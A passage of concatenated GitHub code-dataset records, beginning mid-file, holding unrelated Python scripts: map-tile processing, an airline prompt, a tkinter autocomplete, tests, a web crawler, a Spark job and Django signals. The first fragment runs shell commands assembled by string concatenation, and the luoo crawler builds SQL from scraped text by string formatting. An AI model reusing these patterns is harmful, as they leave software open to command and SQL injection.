long1)=num2deg(x,y,z);\n (lat2, long2)=num2deg(x+1,y+1,z);\n seq=str(int(s));\n minzoom = str(int(z));\n slong1 = str(long1);\n slong2 = str(long2);\n slat1 = str(lat1);\n slat2 = str(lat2);\n if 1 <= int(s) and int(s) <= 96:\n args='psql -d osm_beijing -U postgres -c \\'select * from traffic_exist where z=' + str(int(z)) + ' and ' + 'x=' + str(int(x)) + ' and ' + 'y=' + str(int(y)) + 'and ' + 'seq=' + seq + ';\\'| wc -l';\n sqlline = subprocess.Popen(args, stdout=subprocess.PIPE, shell=True);\n count = int(sqlline.stdout.read())-4;\n if count == 0:\n os.system('psql -d osm_beijing -U postgres -c \\'insert into traffic_exist VALUES(' + str(z) +',' + str(x) + ',' + str(y) + ',' + str(seq) + ')\\'' + ' >> /dev/null 2>&1');\n pcomm = 'psql -d osm_beijing -U postgres -c \"insert into traffic_' + seq + ' ' + 'select a.gid, a.average_speed, a.name, b.the_geom as geom, b.osm_id, c.highway, c.minzoom from traffic_info_' + seq + ' ' +'a, ways_reference b, planet_osm_line c where a.gid = b.gid and b.osm_id = c.osm_id and ST_Intersects(ST_GeometryFromText(\\'POLYGON((' + slong1 + ' ' + slat1 + ',' + slong2 + ' ' + slat1 + ',' + slong2 + ' ' + slat2 + ',' + slong1 + ' ' + slat2 + ',' + slong1 + ' ' + slat1 +'))\\',4326),the_geom) is true and c.minzoom <=' + minzoom + ' ' + ';\"' + ' >> /dev/null 2>&1';\n os.system(pcomm);\n url=':8080/geoserver/osm_ubuntu/ows?service=WFS&version=1.0.0&request=GetFeature&typeName=osm_ubuntu:traffic_beijing&outputFormat=application/json' + '&viewparams=' + 'long1:' + str(long1) +';' + 'lat1:' + str(lat1) + ';' + 'long2:' + str(long2) + ';' + 'lat2:' + str(lat2) + ';' + 'seq:' + seq + ';' + 'minzoom:' + minzoom +' \\n';\n sys.stdout.write(url);\n sys.stdout.flush();\n else:\n sys.stdout.write('/void/void.json' + '\\n');\n sys.stdout.flush();","repo_name":"lchao-bit/server_side_configure","sub_path":"apache_configure/process_traffic_new.py","file_name":"process_traffic_new.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"3426807425","text":"def loop():\n print (\"--------------------------------------------------\")\n fromlocation = input(\"where are you. belarus,chad,philadelphia,brazil,jamaica,democratic republic of the congo,australia,new mexico \")\n locations = [\"belarus\",\"chad\",\"philadelphia\",\"brazil\",\"democratic republic of the congo\",\"australia\",\" belarus\",\" chad\",\"new mexico\",\" philadelphia\",\" brazil\",\" democratic republic of the congo\",\" australia\",\" new mexico\"]\n if not fromlocation in locations:\n print (\"you lyin\")\n loop()\n golocation = input(\"where are you going. belarus,chad,philadelphia,brazil,jamaica,democratic republic of the congo,australia,new mexico \")\n if not golocation in locations:\n print (\"we dont go there\")\n loop()\n if golocation == fromlocation:\n print (\"you already there\")\n loop()\n name = input(\"what is your name \")\n city = input(\"what is your city \")\n birthmonth = input(\"what month were you born? \")\n months = ('january','february','march', 'april', 'may','june','july','august','september','october','november','december')\n if not birthmonth in months:\n print (\"nah\")\n loop()\n birthday = input(\"what day were you born(number not monday,tuesday,wednesday,etc) \")\n days = (1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31)\n if not int(birthday) in days:\n print (\"nah\")\n loop()\n birthyear = input(\"what year were you born? \")\n \n \n classairplane = input(\"what class your ordering 1st class, 2nd class, 3rd class \")\n classes = (\"1st class\", \"2nd class\",\"3rd class\")\n \n if not classairplane in classes:\n print (\"nah\")\n loop()\n print (\"--------------------------------------------------\")\n print (name)\n print (\"going to \"+golocation+\" from \"+fromlocation+\".\")\n print (\"in \"+city+\".\")\n print (\"born \"+birthmonth+\" \"+birthday+\" \"+birthyear+\".\")\n print (classairplane)\nloop()","repo_name":"ljxk/airline-reservation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12942900480","text":"# Source: https://gist.github.com/uroshekic/11078820\r\nfrom tkinter import *\r\nimport re\r\n\r\nclass AutocompleteEntry(Entry):\r\n def __init__(self, root):\r\n self.listboxLength = 8\r\n\r\n Entry.__init__(self, master=root, width=30)\r\n self.focus()\r\n\r\n self.autocompleteList = []\r\n with open(\"../data/species_name.txt\", \"r\") as f:\r\n for line in f.readlines():\r\n self.autocompleteList.append(line[:-1])\r\n \r\n self.var = self[\"textvariable\"]\r\n if self.var == '':\r\n self.var = self[\"textvariable\"] = StringVar()\r\n\r\n self.var.trace('w', self.changed)\r\n self.bind(\"\", self.selection)\r\n self.bind(\"\", self.moveUp)\r\n self.bind(\"\", self.moveDown)\r\n \r\n self.listboxUp = False\r\n \r\n def matchesFunction(self, fieldValue, acListEntry):\r\n pattern = re.compile('.*' + re.escape(fieldValue) + '.*', re.IGNORECASE)\r\n return re.match(pattern, acListEntry)\r\n\r\n def changed(self, name, index, mode):\r\n if self.var.get() == '':\r\n if self.listboxUp:\r\n self.listbox.destroy()\r\n self.listboxUp = False\r\n else:\r\n words = self.comparison()\r\n if words:\r\n if not self.listboxUp:\r\n self.listbox = Listbox(width=self[\"width\"], height=self.listboxLength)\r\n self.listbox.bind(\"\", self.selection)\r\n self.listbox.bind(\"\", self.selection)\r\n self.listbox.place(x=self.winfo_x(), y=self.winfo_y() + self.winfo_height())\r\n self.listboxUp = True\r\n \r\n self.listbox.delete(0, END)\r\n for w in words:\r\n self.listbox.insert(END,w)\r\n else:\r\n if self.listboxUp:\r\n self.listbox.destroy()\r\n self.listboxUp = False\r\n \r\n def selection(self, event):\r\n if self.listboxUp:\r\n self.var.set(self.listbox.get(ACTIVE))\r\n self.listbox.destroy()\r\n self.listboxUp = False\r\n self.icursor(END)\r\n\r\n def moveUp(self, event):\r\n if self.listboxUp:\r\n if self.listbox.curselection() == ():\r\n index = '0'\r\n else:\r\n index = self.listbox.curselection()[0]\r\n \r\n if index != '0': \r\n self.listbox.selection_clear(first=index)\r\n index = str(int(index) - 1)\r\n \r\n self.listbox.see(index) # Scroll!\r\n self.listbox.selection_set(first=index)\r\n self.listbox.activate(index)\r\n\r\n def moveDown(self, event):\r\n if self.listboxUp:\r\n if self.listbox.curselection() == ():\r\n index = '0'\r\n else:\r\n index = self.listbox.curselection()[0]\r\n \r\n if index != END: \r\n self.listbox.selection_clear(first=index)\r\n index = str(int(index) + 1)\r\n \r\n self.listbox.see(index) # Scroll!\r\n self.listbox.selection_set(first=index)\r\n self.listbox.activate(index) \r\n\r\n def comparison(self):\r\n return [ w for w in self.autocompleteList if self.matchesFunction(self.var.get(), w) ]\r\n","repo_name":"ymmouse/DSCI_551_project","sub_path":"gui/autofill.py","file_name":"autofill.py","file_ext":"py","file_size_in_byte":3438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16735289284","text":"# Ref: Course\ndef merge_sort(string, start=0, end=None):\n if end is None:\n end = len(string)\n if (end - start) > 1:\n mid = (start + end) // 2\n merge_sort(string, start, mid)\n merge_sort(string, mid, end)\n merge(string, start, mid, end)\n\n\ndef merge(string, start, mid, end):\n left = string[start:mid]\n right = string[mid:end]\n\n left_index, right_index = 0, 0\n\n for general_index in range(start, end):\n if left_index >= len(left):\n string[general_index] = right[right_index]\n right_index = right_index + 1\n elif right_index >= len(right):\n string[general_index] = left[left_index]\n left_index = left_index + 1\n elif left[left_index] < right[right_index]:\n string[general_index] = left[left_index]\n left_index = left_index + 1\n else:\n string[general_index] = right[right_index]\n right_index = right_index + 1\n\n\ndef is_anagram(first_string, second_string):\n first_string_in_list = [letter.lower() for letter in first_string]\n second_string_in_list = [letter.lower() for letter in second_string]\n\n merge_sort(first_string_in_list)\n merge_sort(second_string_in_list)\n\n first_ordered_string = \"\".join(first_string_in_list)\n second_ordered_string = \"\".join(second_string_in_list)\n is_anagram_result = True\n\n if len(first_string) <= 0 or len(second_string) <= 0:\n return (first_ordered_string, second_ordered_string, False)\n\n for letter in first_ordered_string:\n if letter != second_ordered_string[first_ordered_string.index(letter)]:\n is_anagram_result = False\n break\n return (first_ordered_string, second_ordered_string, is_anagram_result)\n","repo_name":"LuizFelipe406/python-algorithms","sub_path":"challenges/challenge_anagrams.py","file_name":"challenge_anagrams.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28951639147","text":"\"\"\"Tests for the config flow.\"\"\"\nimport re\nimport pytest\n\nfrom unittest.mock import ANY, patch\nfrom homeassistant.const import (\n CONF_AUTHENTICATION,\n CONF_NAME,\n CONF_PASSWORD,\n CONF_SCAN_INTERVAL,\n CONF_URL,\n CONF_USERNAME,\n CONF_VERIFY_SSL,\n HTTP_BASIC_AUTHENTICATION,\n)\nfrom pytest_homeassistant_custom_component.common import MockConfigEntry\n\nfrom custom_components.nipca_custom import config_flow\nfrom custom_components.nipca_custom.const import (\n DEFAULT_NAME,\n DOMAIN,\n SCAN_INTERVAL,\n STEP_CONFIG,\n STILL_IMAGE,\n)\n\nfrom tests.conftest import TEST_URL, TEST_URL_PATTERN\nfrom tests.test_binary_sensor import URL_INFO_LINES\n\n\n@pytest.mark.asyncio\nasync def test_validate_auth_valid(httpx_mock, hass):\n \"\"\"Test no exception is raised for a valid path.\"\"\"\n httpx_mock.add_response(url=TEST_URL, text=URL_INFO_LINES)\n httpx_mock.add_response(url=STILL_IMAGE.format(TEST_URL))\n response = await config_flow.is_valid_auth({CONF_URL: TEST_URL}, {}, hass)\n assert response is True\n\n\n@pytest.mark.asyncio\nasync def test_validate_auth_invalid(httpx_mock, hass):\n \"\"\"Test no exception is raised for a valid path.\"\"\"\n httpx_mock.add_response(url=TEST_URL, status_code=404)\n response = await config_flow.is_valid_auth({CONF_URL: TEST_URL}, {}, hass)\n assert response is False\n\n\n@pytest.mark.asyncio\n@patch(\"custom_components.nipca_custom.config_flow.DLinkUPNPProfile.async_discover\")\nasync def test_flow_user_init(async_discover, hass):\n \"\"\"Test the initialization of the form in the first step of the config flow.\"\"\"\n async_discover.return_value = [{\"LOCATION\": \"test\"}]\n result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": \"user\"}\n )\n expected = {\n \"data_schema\": ANY,\n \"description_placeholders\": None,\n \"errors\": None,\n \"flow_id\": ANY,\n \"handler\": \"nipca_custom\",\n \"last_step\": None,\n \"step_id\": \"user\",\n \"type\": \"form\",\n }\n\n assert expected == result\n assert CONF_NAME in result[\"data_schema\"].schema\n assert CONF_URL in result[\"data_schema\"].schema\n\n\n@pytest.mark.asyncio\nasync def test_flow_auth_form(hass):\n \"\"\"Test the initialization of the form in the second step of the config flow.\"\"\"\n result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": \"auth\"}\n )\n expected = {\n \"data_schema\": config_flow.AUTH_SCHEMA,\n \"description_placeholders\": None,\n \"errors\": {},\n \"flow_id\": ANY,\n \"handler\": \"nipca_custom\",\n \"step_id\": \"auth\",\n \"last_step\": None,\n \"type\": \"form\",\n }\n assert expected == result\n\n\n@pytest.mark.asyncio\n@patch(\"custom_components.nipca_custom.config_flow.is_valid_auth\")\nasync def test_flow_auth_invalid(is_valid_auth, hass):\n \"\"\"Test errors populated when auth is invalid.\"\"\"\n is_valid_auth.return_value = False\n config_flow.NipcaConfigFlow.data = {}\n _result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": \"auth\"}\n )\n result = await hass.config_entries.flow.async_configure(\n _result[\"flow_id\"], user_input={CONF_USERNAME: \"bad\", CONF_PASSWORD: \"bad\"}\n )\n assert {\"base\": \"invalid_auth\"} == result[\"errors\"]\n\n\n@pytest.mark.asyncio\nasync def test_flow_config_form(hass):\n \"\"\"Test the initialization of the form in the third step of the config flow.\"\"\"\n result = await hass.config_entries.flow.async_init(\n config_flow.DOMAIN, context={\"source\": STEP_CONFIG}\n )\n expected = {\n \"data_schema\": config_flow.get_config_schema(SCAN_INTERVAL),\n \"description_placeholders\": None,\n \"errors\": None,\n \"flow_id\": ANY,\n \"handler\": \"nipca_custom\",\n \"step_id\": STEP_CONFIG,\n \"last_step\": None,\n \"type\": \"form\",\n }\n assert expected == result\n\n\n@pytest.mark.asyncio\nasync def test_options_flow_init(httpx_mock, hass):\n \"\"\"Test config flow options.\"\"\"\n httpx_mock.add_response(url=TEST_URL, text=URL_INFO_LINES)\n httpx_mock.add_response(url=re.compile(TEST_URL_PATTERN))\n\n config_entry = MockConfigEntry(\n domain=DOMAIN,\n unique_id=\"test_unique_id\",\n data={\n CONF_URL: TEST_URL,\n CONF_AUTHENTICATION: HTTP_BASIC_AUTHENTICATION,\n CONF_USERNAME: \"test\",\n CONF_PASSWORD: \"test\",\n CONF_VERIFY_SSL: False,\n CONF_NAME: \"NIPCA Custom\",\n CONF_SCAN_INTERVAL: 10,\n },\n options={\n CONF_SCAN_INTERVAL: 5,\n },\n )\n config_entry.add_to_hass(hass)\n assert await hass.config_entries.async_setup(config_entry.entry_id)\n await hass.async_block_till_done()\n\n # show initial form\n _result = await hass.config_entries.options.async_init(config_entry.entry_id)\n\n assert \"form\" == _result[\"type\"]\n assert \"init\" == _result[\"step_id\"]\n assert None is _result[\"errors\"]\n\n result = await hass.config_entries.options.async_configure(\n _result[\"flow_id\"],\n user_input={CONF_SCAN_INTERVAL: 5},\n )\n\n assert \"create_entry\" == result[\"type\"]\n assert {\"scan_interval\": 5} == result[\"data\"]\n\n # Unload the entry and verify that the data has been removed\n assert await hass.config_entries.async_unload(config_entry.entry_id)\n assert config_entry.entry_id not in hass.data[DOMAIN]\n","repo_name":"uncle-yura/nipca_custom","sub_path":"tests/test_config_flow.py","file_name":"test_config_flow.py","file_ext":"py","file_size_in_byte":5418,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"1768199231","text":"import os\nimport time\nfrom getmodule.get_collector import GetCollector\nfrom getmodule.csv_util import CsvWriter\nfrom getmodule.file_path_util import FilePathUtil\n\nclass GetCollectorExecuter:\n HEADARE = ['horse_id', '馬名', '性', '生年', '馬主']\n \n def __init__(self, sire_name):\n self.sire_name = sire_name\n\n # datas/種牡馬の名前/horse_base.csvのファイルを作成\n def get_get_dict(self) -> None:\n # 種牡馬のサブディレクトリの作成\n sire_dir = FilePathUtil.get_sire_dir(self.sire_name)\n os.makedirs(sire_dir, exist_ok=True)\n\n # 産駒のCSVのパスを生成\n horse_base_csv_path = FilePathUtil.get_horse_base_csv_path(self.sire_name)\n \n # horse_base_csv_pathに対するCsvWriterを宣言\n csv_writer = CsvWriter(horse_base_csv_path)\n # ファイルをwモードでオープン\n csv_writer.open_file('w')\n # ヘッダーを出力\n csv_writer.writerow(GetCollectorExecuter.HEADARE)\n\n # GetCollectorを作成し処理を実施\n get_collector = GetCollector(self.sire_name)\n\n try:\n while True:\n # 現在の処理対象ページの産駒情報を取得\n get_dict_rsult = get_collector.get_get_dict()\n \n # 全ての処理対象ページの処理が完了した場合はbreak\n if len(get_dict_rsult) == 0:\n break\n\n # 現在の処理対象ページの産駒情報をCSVに出力\n for horse_id, horse_datas in get_dict_rsult.items():\n csv_writer.writerow([horse_id] + horse_datas)\n\n #「1回URL叩いたら1秒Sleepしましょう」なので1秒スリープ\n time.sleep(1)\n finally:\n # CsvWriterをクローズ\n csv_writer.close_file()\n ","repo_name":"small-java-world/growth_curve_of_horse","sub_path":"getmodule/get_collector_executer.py","file_name":"get_collector_executer.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41260401189","text":"def knapsack(obj,value,weight,capacity):\r\n pw=[0.0]*len(obj)\r\n for i in range(len(obj)):\r\n pw[i]=value[i]/weight[i]\r\n # if weight[i]>capacity:\r\n # pw[i]=0.0\r\n max_value=0\r\n c1=capacity\r\n while(capacity>0):\r\n m=pw.index(max(pw))\r\n if capacity>weight[m]:\r\n max_value+=value[m]\r\n capacity-=weight[m]\r\n items_taken.append(obj[m])\r\n weights_taken.append(weight[m])\r\n pw[m]=0.0\r\n else:\r\n max_value+=(capacity*value[m])/weight[m]\r\n weights_taken.append(capacity)\r\n capacity-=capacity\r\n items_taken.append(obj[m])\r\n pw[m]=0.0\r\n return max_value\r\n\r\nitems_taken=[]\r\nweights_taken=[]\r\nobj=list(map(str,input('list of items : ').split()))\r\nvalue=list(map(int,input('Corresponding values : ').split()))\r\nweight=list(map(int,input('Corresponding weights : ').split()))\r\ncapacity=int(input('capacity : '))\r\nmax_value=knapsack(obj,value,weight,capacity)\r\nprint(\"maximum profit obtained with given capacity from given list of items with corresponding profits and weights is\",max_value)\r\nprint(\"items taken :\",items_taken)\r\nprint(\"weights are :\",weights_taken)\r\n\r\n'''\r\nA B C D E F G H\r\n10 5 15 7 6 18 3 45\r\n2 3 5 7 1 4 1 16\r\n15\r\n'''","repo_name":"bvsslgayathri-8679/sem","sub_path":"sem4 pdfs/DAA lab/week6/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":1288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7582725616","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n# Created on 2018-01-07 04:24:53\n# Project: luoo-mysql\n\nfrom pyspider.libs.base_handler import *\nimport re\nimport pymysql.cursors\n\n\n# connection = pymysql.connect(\n# host='127.0.0.1',\n# port=3306,\n# user='root',\n# db='music'\n# )\n#\n# cursor = connection.cursor()\n\n\nclass DBHelper:\n def __init__(self):\n self.connection = pymysql.connect(\n host='127.0.0.1',\n port=3306,\n user='root',\n db='music',\n use_unicode=True,\n charset=\"utf8\"\n )\n self.table_vol = 'vol'\n self.table_track = 'track'\n self.cursor = self.connection.cursor()\n\n def execute_sql(self, sql):\n try:\n self.cursor.execute(sql)\n self.connection.commit()\n finally:\n self.connection.close()\n\n def insert(self, table, tdict):\n column = ''\n value = ''\n\n for key in tdict:\n if tdict[key] is not None:\n column += \",\" + key\n value += \"\\\",\\\"\" + tdict[key]\n\n sql = 'INSERT INTO %s (%s) VALUES (%s)' % (table, column, value)\n\n print(sql)\n\n try:\n self.cursor.execute(sql)\n self.connection.commit()\n\n last_id = self.cursor.lastrowid\n\n print(last_id)\n\n return last_id\n finally:\n self.connection.close()\n\n def update(self, table, condition, tdict):\n column = ''\n value = ''\n for key in condition:\n column += \",%s=\\\"%s\\\"\" % (key, condition[key])\n\n for key in tdict:\n value += \", %s=\\\"%s\\\"\" % (key, tdict[key])\n\n column = column[1:]\n value = value[1:]\n\n sql = 'UPDATE %s SET %s WHERE %s' % (table, value, column)\n\n print(sql)\n\n self.execute_sql(sql)\n\n def save_or_update(self, table, tdict):\n column = ''\n value = ''\n update = ''\n for key in tdict:\n if tdict[key] is not None:\n column += \",\" + key\n value += \"\\\",\\\"\" + tdict[key]\n update += \",\" + key + \"=\\\"\" + tdict[key] + \"\\\"\"\n\n column = column[1:]\n value = value[2:] + \"\\\"\"\n update = update[1:]\n\n sql = 'INSERT INTO %s (%s) VALUES (%s) ON DUPLICATE KEY UPDATE %s' % (table, column, value, update)\n\n print(sql)\n\n self.cursor.execute(sql)\n self.connection.commit()\n\n last_id = self.cursor.lastrowid\n\n # self.cursor.close()\n\n def batch_save_or_update(self, table, tlist):\n columns = []\n values = []\n updates = []\n\n for tdict in tlist:\n column = ''\n value = ''\n update = ''\n\n for key in tdict:\n if tdict[key] is not None:\n column += \",\" + key\n value += \"\\\",\\\"\" + tdict[key]\n update += \",\" + key + \"=VALUES(\" + key + \")\"\n\n columns.append(\"(\" + column[1:] + \")\")\n values.append(\"(\" + value[2:] + \"\\\"\" + \")\")\n updates.append(update[1:])\n\n print(updates)\n\n sql = 'INSERT INTO %s %s VALUES %s ON DUPLICATE KEY UPDATE %s' % (table, columns[0], \",\".join(values),\n updates[0])\n\n print(sql)\n\n self.cursor.execute(sql)\n self.connection.commit()\n\n last_id = self.cursor.lastrowid\n\n # self.cursor.close()\n\ndb_helper = DBHelper()\n\ndata = dict(\n vol_id='123',\n vol_number='123',\n url='123',\n title='123',\n description='changed',\n cover='cover changed',\n vol_prev='123',\n vol_next='23',\n)\n\n\nTRACK_URL_PREFIX = 'http://mp3-cdn2.luoo.net/low/luoo/radio'\n\nHOST = 'www.luoo.net'\nREFERER = 'http://www.luoo.net'\nUSER_AGENT = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36'\nHTTP_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate, sdch',\n 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6',\n 'Connection': 'keep-alive',\n 'DNT': '1',\n 'Host': HOST,\n 'Referer': REFERER,\n 'User-Agent': USER_AGENT,\n}\n\n\nclass Handler(BaseHandler):\n retry_delay = {\n 0: 12 * 60 * 60,\n '': 24 * 60 * 60\n }\n crawl_config = {\n 'headers': {\n 'User-Agent': USER_AGENT,\n },\n 'auto_crawl': True,\n 'itag': 'v0.1.1',\n }\n\n @every(minutes=24 * 60)\n def on_start(self):\n self.crawl('http://www.luoo.net/tag/?p=1', callback=self.index_page)\n\n @config(age=10 * 24 * 60 * 60)\n def index_page(self, response):\n\n # 详情页面\n for each in response.doc('a[href^=\"http://www.luoo.net/vol/index/\"]').items():\n self.crawl(each.attr.href, callback=self.detail_page)\n\n for each in response.doc('a[href^=\"http://www.luoo.net/tag/?p=\"]').items():\n self.crawl(each.attr.href, callback=self.index_page)\n\n @config(priority=2)\n def detail_page(self, response):\n vol_id = response.doc('.btn-action-like').attr['data-id']\n vol_number = response.doc('.vol-number').text()\n tags = []\n track_list = []\n\n for each in response.doc('.vol-tags').find('.vol-tag-item').items():\n tags.append(each.text())\n\n for each in response.doc('.track-item').items():\n order_and_name = re.search(r\"^(\\d+)\\.(.+)\", each.find('.trackname').text())\n\n track = {\n 'track_id': each.attr.id.replace('track', ''),\n 'vol_id': vol_id,\n 'order_id': str(int(order_and_name.group(1))),\n 'name': re.escape(order_and_name.group(2)),\n 'artist': re.escape(each.find('.player-wrapper > .artist').text().replace('Artist:', '').strip()),\n 'album': re.escape(each.find('.player-wrapper > .album').text().replace('Album:', '').strip()),\n 'cover': each.find('.player-wrapper > .cover').attr.src,\n 'url': TRACK_URL_PREFIX + str(vol_number) + '/' + order_and_name.group(1) + '.mp3'\n }\n\n\n track_list.append(track)\n\n db_helper.batch_save_or_update(db_helper.table_track, track_list)\n\n track_list_id = []\n\n # track_id 存入 list\n for track in track_list:\n track_list_id.append(str(track['track_id']))\n\n track_list_id = \",\".join(track_list_id)\n\n result = {\n 'vol_id': vol_id,\n 'vol_number': vol_number,\n 'url': response.url,\n 'title': re.escape(response.doc('title').text()),\n 'description': re.escape(response.doc('.vol-desc').html().strip()),\n 'cover': response.doc('.vol-cover').attr.src,\n 'vol_prev': response.doc('.nav-prev').attr.href,\n 'vol_next': response.doc('.nav-next').attr.href,\n 'created_at': response.doc('.vol-date').html().strip(),\n 'track_list_id': track_list_id,\n 'tags': re.escape(\",\".join(tags)),\n }\n\n db_helper.save_or_update(db_helper.table_vol, result)\n\n return result\n\n @catch_status_code_error\n def callback(self, response):\n # if response\n print(response)\n pass\n\n\n\n\n","repo_name":"zhanglun/pureloser","sub_path":"spider/luoo/luowang-mysql.py","file_name":"luowang-mysql.py","file_ext":"py","file_size_in_byte":7343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71927270762","text":"def win(board):\n for row in board:\n if all(i[1] == -1 for i in row): return True\n for col in zip(*board):\n if all(i[1] == -1 for i in col): return True\n return False\n\ndef solve1(lines):\n a = list(lines)\n numbers = [*map(int, a.pop(0).split(\",\"))]\n a.pop(0)\n b = '\\n'.join(a).split(\"\\n\\n\")\n boards = [ [list(map(lambda x: [int(x), int(x)],j.split())) for j in i.split(\"\\n\")] for i in b]\n\n for i in numbers:\n for x in range(len(boards)):\n for y in range(len(boards[x])):\n for z in range(len(boards[x][y])):\n if boards[x][y][z][1] == i: boards[x][y][z][1] = -1\n\n for b in boards:\n if win(b):\n return i*sum(sum(i[0] for i in row if i[0]==i[1]) for row in b)\n\ndef solve2(lines):\n a = list(lines)\n numbers = [*map(int, a.pop(0).split(\",\"))]\n a.pop(0)\n b = '\\n'.join(a).split(\"\\n\\n\")\n boards = [ [list(map(lambda x: [int(x), int(x)],j.split())) for j in i.split(\"\\n\")] for i in b]\n\n found = False\n for i in numbers:\n for x in range(len(boards)):\n for y in range(len(boards[x])):\n for z in range(len(boards[x][y])):\n if boards[x][y][z][1] == i: boards[x][y][z][1] = -1\n\n if not found:\n states = [win(b) for b in boards]\n if states.count(0) == 1:\n found = True\n ind = states.index(0)\n elif win(boards[ind]):\n return i*sum(sum(i[0] for i in row if i[0]==i[1]) for row in boards[ind])\n\n\n\nimport sys\nlines = [l.rstrip('\\n') for l in sys.stdin]\nprint(\"\\033[96m\\033[1m[*] PART 1:\", solve1(lines), \"\\033[0m\")\nprint(\"\\033[92m\\033[1m[*] PART 2:\", solve2(lines), \"\\033[0m\")","repo_name":"dnzc/AdventOfCode","sub_path":"2021/day04.py","file_name":"day04.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28154185961","text":"def lol(l,a,s):\r\n\tfor i in range(0,len(l)):\r\n\t\tif i == a:\r\n\t\t\tdel l[i]\r\n\tif len(l) < s+1 :\r\n\t\treturn l \r\n\t\t\r\n\ta=l[a]\r\n\tfor x in l:\r\n\t\tprint(x, end=\" \")\r\n\tprint()\r\n\t\r\n\tlol(l,a-1,s)\r\n\r\n\r\ns =int (input(\"enter you'r lucky number:\"))\r\nl=list()\r\nfor i in range(1,100):\r\n\tl.append(i)\r\n'''for i in l:\r\n\tprint(i, end=\" \")\r\nprint()'''\r\na =1\r\nlucky = lol(l,a,s)\r\nfor i in l:\r\n\tprint(i,end=\" \")\r\n\r\n","repo_name":"3vilbird/machinelearning","sub_path":"intern/lucky.py","file_name":"lucky.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"35496078200","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import Row\nfrom pyspark.sql import functions\n\ndef loadMovieNames():\n movieNames = {}\n with open(\"ml-100k/u.items\") as f:\n for line in f:\n fields = line.split('|')\n movieNames[int(fields[0])] = fields[1]\n return movieNames\n\ndef parseInput(line):\n fields = line.split()\n # (movieID, (ratings, 1.0))\n return Row(movieID = int(fields[1]), rating = float(fields[2]))\n\nif __name__ == \"__main__\":\n\n # Create a Spark Session\n # getOrCreate() either creates a new session or gets the older session that was not stopped previously\n spark = SparkSession.builder.enableHiveSupport().appName(\"WorstMovies\").getOrCreate()\n \n # creating a dictionary that creates mapping of movie ID to movie name\n movieNames = loadMovieNames()\n\n # get the raw data\n lines = spark.sparkContext.textFile(\"hdfs:///user/maria_dev/ml-100k/u.data\")\n # converting the data into RDD of row objects (movieID, rating)\n movies = lines.map(parseInput)\n # converting the row objects into DataFrame\n movieDataset = spark.createDataFrame(movies)\n\n # computing the average of the ratings of each movie ID\n averageRatings = movieDataset.groupBy(\"movieID\").avg(\"rating\")\n\n # computing the counts of ratings for each movie ID\n counts = movieDataset.groupBy(\"movieID\").count()\n\n # only choosing those ratings that are being rated by more than 10 people\n counts = counts.filter(\"count > 10\")\n\n # joining both the averageRatings and counts dataset over movieID\n averageAndCounts = counts.join(averageRatings, \"movieID\")\n\n # taking the top 10 results\n results = averageAndCounts.orderBy(\"avg(rating)\").take(10)\n\n # Display the results, by mapping the movieID to movie name\n for res in results:\n print(movieNames[res[0]], res[1], res[2])\n\n # Stopping the Spark session\n spark.stop()","repo_name":"santhosh96/BigData","sub_path":"Spark/LowestAverageRatingDataframe.py","file_name":"LowestAverageRatingDataframe.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39314492927","text":"from django.dispatch import receiver\nfrom django.db.models.signals import post_save, post_delete\nfrom django.utils.text import slugify\nfrom .models import Product\nfrom frontend.models import CategorySite\nfrom .models import SizeAttribute\n\n\n@receiver(post_save, sender=Product)\ndef create_product_slug(sender, instance, **kwargs):\n if not instance.slug:\n new_slug = slugify(instance.title, allow_unicode=True)\n qs_exists = Product.objects.filter(slug=new_slug)\n if qs_exists.exists():\n new_slug = f'{new_slug}-{instance.id}'\n instance.slug = new_slug\n instance.save()\n\n \n@receiver(post_save, sender=CategorySite)\ndef create_category_slug(sender, instance, **kwargs):\n if not instance.slug:\n new_slug = slugify(instance.name, allow_unicode=True)\n qs_exists = Product.objects.filter(slug=new_slug)\n if qs_exists.exists():\n new_slug = f'{new_slug}-{instance.id}'\n instance.slug = new_slug\n instance.save()\n\n\n@receiver(post_delete, sender=SizeAttribute)\ndef delete_size_attribute(sender, instance, **kwargs):\n product = instance.product_related\n product.qty -= instance.qty\n product.save()","repo_name":"Zefarak/my_shop","sub_path":"products/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 